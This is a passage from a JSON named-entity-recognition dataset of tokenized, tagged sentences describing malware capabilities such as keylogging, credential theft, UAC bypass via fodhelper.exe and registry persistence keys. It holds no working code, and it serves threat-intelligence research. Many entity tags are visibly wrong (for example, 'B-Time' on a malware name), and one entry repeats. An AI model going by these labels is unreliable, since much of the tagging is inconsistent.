"cacls.exe." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "download", - "files", - "and", - "upgrade", - "itself." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "contains", - "a", - "custom", - "keylogger." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "obtain", - "the", - "permissions", - "of", - "the", - "victim", - "user." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "send", - "email", - "over", - "SMTP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "JPIN", - "uses", - "a", - "encrypted", - "and", - "compressed", - "payload", - "that", - "is", - "disguised", - "as", - "a", - "bitmap", - "within", - "the", - "resource", - "section", - "of", - "the", - "installer." - ], - "ner_tags": [ - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "list", - "running", - "processes." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "inject", - "content", - "into", - "lsass.exe", - "to", - "load", - "a", - "module." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "I-Features", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "enumerate", - "Registry", - "keys." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "checks", - "for", - "the", - "presence", - "of", - "certain", - "security-related", - "processes", - "and", - "deletes", - "its", - "installer/uninstaller", - "component", - "if", - "it", - "identifies", - "any", - "of", - "them." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "obtain", - "system", - "information", - "such", - "as", - "OS", - "version", - "and", - "disk", - "space." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "obtain", - "network", - "information,", - "including", - "DNS,", - "IP,", - "and", - "proxies." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "obtain", - "the", - "victim", - "user", - "name." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "list", - "running", - "services." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "use", - "the", - "command-line", - "utility", - "cacls.exe", - "to", - "change", - "file", - "permissions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JPIN", - "can", - "use", - "the", - "command-line", - "utility", - "cacls.exe", - "to", - "change", - "file", - "permissions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JSS", - "Loader", - "has", - "the", - "ability", - "to", - "download", - "malicious", - "executables", - "to", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "B-HackOrg", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JSS", - "Loader", - "can", - "download", - "and", - "execute", - "JavaScript", - "files." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "JSS", - "Loader", - "has", - "been", - "executed", - "through", - "malicious", - "attachments", - "contained", - "in", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "JSS", - "Loader", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "PowerShell", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "JSS", - "Loader", - "has", - "the", - "ability", - "to", - "launch", - "scheduled", - "tasks", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "JSS", - "Loader", - "has", - "been", - "delivered", - "by", - "phishing", - "emails", - "containing", - "malicious", - "Microsoft", - "Excel", - "attachments." - ], - "ner_tags": [ - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "I-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "JSS", - "Loader", - "can", - "download", - "and", - "execute", - "VBScript", - "files." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg", - "B-Features" - ] - }, - { - "tokens": [ - "Janicab", - "captured", - "audio", - "and", - "sent", - "it", - "out", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Janicab", - "used", - "a", - "valid", - "AppleDeveloperID", - "to", - "sign", - "the", - "code", - "to", - "get", - "past", - "security", - "restrictions." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Janicab", - "used", - "a", - "cron", - "job", - "for", - "persistence", - "on", - "Mac", - "devices." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Janicab", - "captured", - "screenshots", - "and", - "sent", - "them", - "out", - "to", - "a", - "C2", - "server." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "can", - "use", - "large", - "obfuscated", - "libraries", - "to", - "hinder", - "detection", - "and", - "analysis." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "can", - "capture", - "login", - "credentials", - "from", - "open", - "browsers", - "including", - "Firefox,", - "Chrome,", - "Internet", - "Explorer,", - "and", - "Edge." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "I-Tool", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Javali", - "can", - "use", - "DLL", - "side-loading", - "to", - "load", - "malicious", - "DLLs", - "into", - "legitimate", - "executables." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "can", - "read", - "C2", - "information", - "from", - "Google", - "Documents", - "and", - "YouTube." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "can", - "download", - "payloads", - "from", - "remote", - "C2", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "has", - "achieved", - "execution", - "through", - "victims", - "opening", - "malicious", - "attachments,", - "including", - "MSI", - "files", - "with", - "embedded", - "VBScript." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "has", - "achieved", - "execution", - "through", - "victims", - "clicking", - "links", - "to", - "malicious", - "websites." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "has", - "used", - "the", - "MSI", - "installer", - "to", - "download", - "and", - "execute", - "malicious", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "can", - "monitor", - "processes", - "for", - "open", - "browsers", - "and", - "custom", - "banking", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Javali", - "has", - "been", - "delivered", - "as", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Javali", - "has", - "been", - "delivered", - "via", - "malicious", - "links", - "embedded", - "in", - "e-mails." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Javali", - "has", - "used", - "embedded", - "VBScript", - "to", - "download", - "malicious", - "payloads", - "from", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KARAE", - "can", - "use", - "public", - "cloud-based", - "storage", - "providers", - "for", - "command", - "and", - "control." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KARAE", - "was", - "distributed", - "through", - "torrent", - "file-sharing", - "websites", - "to", - "South", - "Korean", - "victims,", - "using", - "a", - "YouTube", - "video", - "downloader", - "application", - "as", - "a", - "lure." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Area", - "I-Area", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KARAE", - "can", - "upload", - "and", - "download", - "files,", - "including", - "second-stage", - "malware." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KARAE", - "can", - "collect", - "system", - "information." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "has", - "the", - "capability", - "to", - "delete", - "files", - "off", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "has", - "a", - "command", - "to", - "search", - "for", - "files", - "on", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "can", - "upload", - "files", - "to", - "the", - "victim’s", - "machine", - "and", - "can", - "download", - "additional", - "payloads." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "has", - "a", - "command", - "to", - "create", - "Registry", - "entries", - "for", - "storing", - "data", - "under", - "<code>HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\WABE\\DataPath</code>." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "can", - "obtain", - "a", - "list", - "of", - "running", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "can", - "capture", - "screenshots", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "uses", - "a", - "customized", - "XOR", - "algorithm", - "to", - "encrypt", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "has", - "the", - "capability", - "to", - "collect", - "the", - "computer", - "name,", - "language", - "settings,", - "the", - "OS", - "version,", - "CPU", - "information,", - "disk", - "devices,", - "and", - "time", - "elapsed", - "since", - "system", - "start." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "gathers", - "the", - "MAC", - "address", - "of", - "the", - "victim’s", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "B-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYMARBLE", - "can", - "execute", - "shell", - "commands", - "using", - "cmd.exe." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "KEYPLUG", - "can", - "use", - "TLS-encrypted", - "WebSocket", - "Protocol", - "(WSS)", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "KEYPLUG", - "Windows", - "variant", - "has", - "retrieved", - "C2", - "addresses", - "from", - "encoded", - "data", - "in", - "posts", - "on", - "tech", - "community", - "forums." - ], - "ner_tags": [ - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "KEYPLUG", - "can", - "decode", - "its", - "configuration", - "file", - "to", - "determine", - "C2", - "protocols." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYPLUG", - "can", - "use", - "a", - "hardcoded", - "one-byte", - "XOR", - "encoded", - "configuration", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYPLUG", - "can", - "use", - "TCP", - "and", - "KCP", - "(KERN", - "Communications", - "Protocol)", - "over", - "UDP", - "for", - "C2", - "communication." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYPLUG", - "has", - "used", - "Cloudflare", - "CDN", - "associated", - "infrastructure", - "to", - "redirect", - "C2", - "communications", - "to", - "malicious", - "domains." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYPLUG", - "can", - "obtain", - "the", - "current", - "tick", - "count", - "of", - "an", - "infected", - "computer." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KEYPLUG", - "has", - "the", - "ability", - "to", - "communicate", - "over", - "HTTP", - "and", - "WebSocket", - "Protocol", - "(WSS)", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "collect", - "credentials", - "from", - "WINSCP." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "has", - "the", - "ability", - "to", - "steal", - "data", - "from", - "the", - "Chrome,", - "Edge,", - "Firefox,", - "Thunderbird,", - "and", - "Opera", - "browsers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Way", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "send", - "a", - "file", - "containing", - "victim", - "system", - "information", - "to", - "C2." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "decrypt", - "encrypted", - "strings", - "and", - "write", - "them", - "to", - "a", - "newly", - "created", - "folder." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "has", - "used", - "encrypted", - "strings", - "in", - "its", - "installer." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "exfiltrate", - "collected", - "information", - "from", - "the", - "host", - "to", - "the", - "C2", - "server." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "enumerate", - "files", - "and", - "directories", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "has", - "the", - "ability", - "to", - "download", - "and", - "execute", - "code", - "from", - "remote", - "servers." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "perform", - "keylogging", - "by", - "polling", - "the", - "<code>GetAsyncKeyState()</code>", - "function." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "save", - "collected", - "system", - "information", - "to", - "a", - "file", - "named", - "\"info\"", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "harvest", - "data", - "from", - "mail", - "clients." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "has", - "the", - "ability", - "to", - "set", - "the", - "<code>HKCU\\Environment\\UserInitMprLogonScript</code>", - "Registry", - "key", - "to", - "execute", - "logon", - "scripts." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "has", - "been", - "spread", - "through", - "Word", - "documents", - "containing", - "malicious", - "macros." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Tool", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "has", - "masqueraded", - "as", - "a", - "legitimate", - "Windows", - "tool." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "execute", - "PowerShell", - "commands", - "on", - "the", - "victim's", - "machine." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "collect", - "information", - "on", - "installed", - "applications." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "collect", - "drive", - "information", - "from", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "send", - "data", - "to", - "C2", - "with", - "HTTP", - "POST", - "requests." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "has", - "the", - "ability", - "to", - "set", - "a", - "Registry", - "key", - "to", - "run", - "a", - "cmd.exe", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "KGH_SPY", - "can", - "collect", - "credentials", - "from", - "the", - "Windows", - "Credential", - "Manager." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "will", - "perform", - "UAC", - "bypass", - "either", - "through", - "fodhelper.exe", - "or", - "eventvwr.exe." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "can", - "delete", - "created", - "registry", - "keys", - "used", - "for", - "persistence", - "as", - "part", - "of", - "its", - "cleanup", - "procedure." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "obfuscated", - "scripts", - "with", - "the", - "BatchEncryption", - "tool." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "deobfuscated", - "itself", - "before", - "executing", - "its", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "will", - "attempt", - "to", - "delete", - "or", - "disable", - "all", - "Registry", - "keys", - "and", - "scheduled", - "tasks", - "related", - "to", - "Microsoft", - "Security", - "Defender", - "and", - "Security", - "Essentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-SecTeam", - "I-SecTeam", - "I-SecTeam", - "O", - "O", - "B-SecTeam" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "used", - "<code>-WindowsStyle", - "Hidden</code>", - "to", - "hide", - "the", - "command", - "window." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "executed", - "a", - "PowerShell", - "command", - "to", - "download", - "a", - "file", - "to", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "relied", - "on", - "victims", - "clicking", - "a", - "malicious", - "document", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "relied", - "on", - "victims", - "clicking", - "on", - "a", - "malicious", - "link", - "delivered", - "via", - "email." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "been", - "disguised", - "as", - "legitimate", - "software", - "programs", - "associated", - "with", - "the", - "travel", - "and", - "airline", - "industries." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "I-Idus", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "added", - "and", - "deleted", - "keys", - "from", - "the", - "Registry." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "can", - "use", - "the", - "`LoadResource`", - "and", - "`CreateProcessW`", - "APIs", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "used", - "PowerShell", - "commands", - "to", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "deployed", - "a", - "modified", - "version", - "of", - "Invoke-Ngrok", - "to", - "expose", - "open", - "local", - "ports", - "to", - "the", - "Internet." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "can", - "set", - "the", - "AutoRun", - "Registry", - "key", - "with", - "a", - "PowerShell", - "command." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "been", - "distributed", - "via", - "spearphishing", - "emails", - "with", - "malicious", - "attachments." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "been", - "distributed", - "as", - "a", - "malicious", - "link", - "within", - "an", - "email." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "checked", - "the", - "OS", - "version", - "using", - "`wmic.exe`", - "and", - "the", - "`find`", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "used", - "VBScript", - "to", - "call", - "wscript", - "to", - "execute", - "a", - "PowerShell", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOCTOPUS", - "has", - "used", - "`cmd.exe`", - "and", - "batch", - "files", - "for", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOMPROGO", - "is", - "capable", - "of", - "retrieving", - "information", - "about", - "the", - "infected", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOMPROGO", - "is", - "capable", - "of", - "creating", - "a", - "reverse", - "shell." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KOMPROGO", - "is", - "capable", - "of", - "running", - "WMI", - "queries." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "encrypted", - "data", - "and", - "files", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "KONNI", - "has", - "bypassed", - "UAC", - "by", - "performing", - "token", - "impersonation", - "as", - "well", - "as", - "an", - "RPC-based", - "method,", - "this", - "included", 